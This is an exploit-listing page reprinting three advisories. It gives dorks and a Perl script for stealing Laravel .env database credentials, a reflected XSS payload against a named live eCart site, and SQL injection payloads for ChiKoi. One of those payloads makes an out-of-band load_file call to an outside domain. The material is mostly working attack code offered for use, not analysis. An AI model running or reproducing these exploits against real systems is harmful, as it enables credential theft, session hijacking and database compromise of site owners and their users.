Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Laravel from Version 1.0 to 9.47.0 MySQL Credential Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://laravel.com/ | | # Dork : db_password filetype:env | "Whoops! There was an error." | ==================================================================================================================================== note : [+] 1 : Laravel's default .env file contains some common configuration values that may differ based on whether your application is running locally or on a production web server. These values are then retrieved from various Laravel configuration files within the config directory using Laravel's env function. [+] 2 : This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc [+] Poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /.env = ( Depending on the server's protection, the result of viewing the file is either direct viewing or downloading the file Or not give you anything ) [+] https://127.0.0.1/lala/.env ==================================================================================================================================== | # Title : Laravel from Version 1.0 to 9.47.0 sensitive information disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://laravel.com/ | | # Dork : "Whoops! There was an error." | ==================================================================================================================================== poc : [+] This framework In case you do not set a page for error it displays sensitive information about hosting passwords, databases ... etc [+] Dorking İn Google Or Other Search Enggine . [+] https://127.0.0.1/lalaland/categorie/avant_apres/ [+] https://youtu.be/tz_w563Nyac ==================================================================================================================================== | # Title : Laravel from Version 1.0 to 9.47.0 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://laravel.com | | # Dork : | ==================================================================================================================================== poc : [-] Download the configuration file: The following Perl exploit will attempt to download the .env file The .env file contains some common configuration values and connection information to the script database Through the code you can control where to save the downloaded file . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # Author : indoushka use LWP::Simple; use LWP::UserAgent; system('cls'); print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n"; system('color a'); if(@ARGV < 2) { print "[+] Author : indoushka \n\n"; print "[-] How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/.env \n"; print "[+] usage2 : perl $0 localhost /.env \n"; } ($TargetIP, $path, $File,) = @ARGV; $File=".env"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/.env"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/.env\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : ecartmultivendorweb.thewrteam.in │ │ Vendor : By WRTEAM Ekart.Com │ │ Software : eCart Web 5.0.0 - Multi Vendor eCommerce Marketplace │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ URL parameter 'category' is vulnerable to XSS Path: /shop https://ecartmultivendorweb.thewrteam.in/shop?category=baby-need-s-1su7mh%3cscript%3ealert(1)%3c%2fscript%3eg9eop&sub-category=test-1 [-] Done </code></pre>

<pre><code>## Title: ChiKoi-1.0 SQLi ## Author: nu11secur1ty ## Date: 01.12.2023 ## Vendor: https://chikoiquan.tanhongit.com/ ## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi ## Description: The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc. ## STATUS: HIGH Vulnerability - CRITICAL [+] Payload: ```MySQL --- Parameter: User-Agent (User-Agent) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- - Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND (SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR --- ``` [+] Online: ```MySQL --- Parameter: User-Agent (User-Agent) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- - --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi) ## Proof and Exploit: [href](https://streamable.com/7x69yz) ## Time spent `01:30:00` ## Writing an exploit `00:05:00` </code></pre>